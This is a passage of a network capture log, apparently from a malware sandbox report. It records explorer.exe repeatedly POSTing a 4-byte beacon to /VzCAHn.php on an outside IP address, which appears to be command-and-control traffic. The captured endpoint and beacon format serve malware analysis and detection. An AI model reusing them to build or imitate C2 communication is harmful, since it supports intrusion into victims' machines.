                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.995955944 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.501616955 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:53 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        24192.168.2.549819185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.734743118 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.854842901 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.181477070 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:55 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        25192.168.2.549822185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.408164024 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.528753042 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.879736900 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:57 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        26192.168.2.549828185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.109808922 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.229659081 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.572005987 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:12:58 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        27192.168.2.549834185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.799293041 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.919336081 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.245629072 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:00 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        28192.168.2.549839185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.471685886 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.591506004 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:02.926867008 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:02 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        29192.168.2.549841185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.162955999 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.282857895 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:04.771467924 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:03 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        30192.168.2.549847185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:05.002820015 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:05.122658968 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.460823059 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:05 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        31192.168.2.549853185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.688276052 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.808378935 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.304063082 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:07 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        32192.168.2.549859185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.533384085 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.653465033 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:09.989485025 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:09 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        33192.168.2.549864185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.219285965 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.339353085 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.655054092 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:10 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        34192.168.2.549866185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.890993118 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:12.010981083 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.353156090 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:12 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        35192.168.2.549872185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.578705072 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.698465109 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.025616884 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:14 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        36192.168.2.549878185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.250941038 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.370851994 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.727989912 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:15 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        37192.168.2.549883185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.953332901 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:17.073338032 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.567558050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:17 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        38192.168.2.549885185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.800961971 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.922790051 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.256155968 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:19 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        39192.168.2.549891185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.484791040 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.604718924 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.121589899 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:21 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        40192.168.2.549897185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.343995094 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.463862896 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.963820934 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:23 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        41192.168.2.549898185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.187975883 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.307919025 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.619158983 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:24 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        42192.168.2.549904185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.844650030 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:25.964493990 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.460812092 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:26 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        43192.168.2.549905185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.688188076 CET277OUTPOST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                        Dec 15, 2024 09:13:27.808394909 CET6OUTData Raw: 48 5f 5e 57
                                                                                                                                                                                                                        Data Ascii: H_^W
                                                                                                                                                                                                                        Dec 15, 2024 09:13:29.326906919 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 16:13:28 GMT
                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
